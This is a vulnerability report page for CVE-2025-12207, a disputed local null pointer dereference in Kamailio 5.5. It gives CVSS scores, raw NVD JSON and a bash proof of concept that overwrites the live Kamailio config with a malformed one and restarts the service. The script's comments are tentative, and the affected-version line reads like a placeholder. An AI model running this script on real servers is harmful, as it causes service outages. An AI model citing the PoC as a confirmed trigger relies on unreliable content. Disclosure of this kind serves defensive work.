Security Vulnerability Report
CVE-2025-12207 CVSS 3.3 LOW

CVE-2025-12207

Published: 2025-10-27 03:15:50
Last Modified: 2026-04-29 01:00:02

Description

A vulnerability has been found in Kamailio 5.5. This affects the function yyerror_at of the file src/core/cfg.y of the component Grammar Rule Handler. Such manipulation leads to null pointer dereference. The attack needs to be performed locally. The exploit has been disclosed to the public and may be used. The actual existence of this vulnerability is currently in question. This attack requires manipulating config files which might not be a realistic scenario in many cases. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score: 3.3
Severity: LOW
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:kamailio:kamailio:5.5.0:*:*:*:*:*:*:* - VULNERABLE
Kamailio 5.5.x < 5.5.x (fixed version)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
bash
#!/bin/bash
# CVE-2025-12207 PoC - Kamailio 5.5 yyerror_at Null Pointer Dereference
# This PoC demonstrates triggering the vulnerability via malformed config

# Create a malicious Kamailio configuration file
cat > /tmp/malicious.cfg << 'EOF'
# Kamailio Configuration File - Malformed for CVE-2025-12207

# Load required modules
loadmodule "sl.so"
loadmodule "tm.so"
loadmodule "rr.so"
loadmodule "maxfwd.so"
loadmodule "usrloc.so"
loadmodule "registrar.so"
loadmodule "textops.so"
loadmodule "textopsx.so"
loadmodule "xlog.so"

# Module parameters
modparam("usrloc", "db_mode", 0)

# Route block with syntax that triggers yyerror_at
route {
    # Intentionally malformed request URI
    # This should trigger the null pointer dereference in yyerror_at
    if (($ru == "") || ($ru.method == "INVITE")) {
        # Force parsing error by using invalid transformation
        $var(test) = $(ru{invalid_transform);
        sl_send_reply("404", "Not Found");
        exit;
    }

    # Another potential trigger point
    if (method=="REGISTER") {
        # Malformed condition that may trigger parser error
        if ($avp(s:invalid) == ) {
            save("location");
        }
        exit;
    }
}

# Error route for handling parsing errors
error_route {
    sl_send_reply("500", "Server Internal Error");
}
EOF

# Backup original config if exists
if [ -f /etc/kamailio/kamailio.cfg ]; then
    cp /etc/kamailio/kamailio.cfg /etc/kamailio/kamailio.cfg.bak
fi

# Replace config and restart Kamailio
cp /tmp/malicious.cfg /etc/kamailio/kamailio.cfg
systemctl restart kamailio

# Check for crash or error in logs
grep -i "null pointer" /var/log/kamailio.log || echo "Check logs manually"

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12207", "sourceIdentifier": "[email protected]", "published": "2025-10-27T03:15:49.937", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Modified", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["disputed"]}], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in Kamailio 5.5. This affects the function yyerror_at of the file src/core/cfg.y of the component Grammar Rule Handler. Such manipulation leads to null pointer dereference. The attack needs to be performed locally. The exploit has been disclosed to the public and may be used. The actual existence of this vulnerability is currently in question. This attack requires manipulating config files which might not be a realistic scenario in many cases. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.9, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", 
"modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:S/C:N/I:N/A:P", "baseScore": 1.7, "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "LOW", "exploitabilityScore": 3.1, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", 
"description": [{"lang": "en", "value": "CWE-404"}, {"lang": "en", "value": "CWE-476"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:kamailio:kamailio:5.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "5F943D79-8040-4E2D-AEBB-CACF52099921"}]}]}], "references": [{"url": "https://shimo.im/docs/vVqRMVMlrycMO63y/", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.329877", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.329877", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.673241", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.openwall.com/lists/oss-security/2025/11/02/3", "source": "[email protected]"}, {"url": "http://www.openwall.com/li ... (truncated)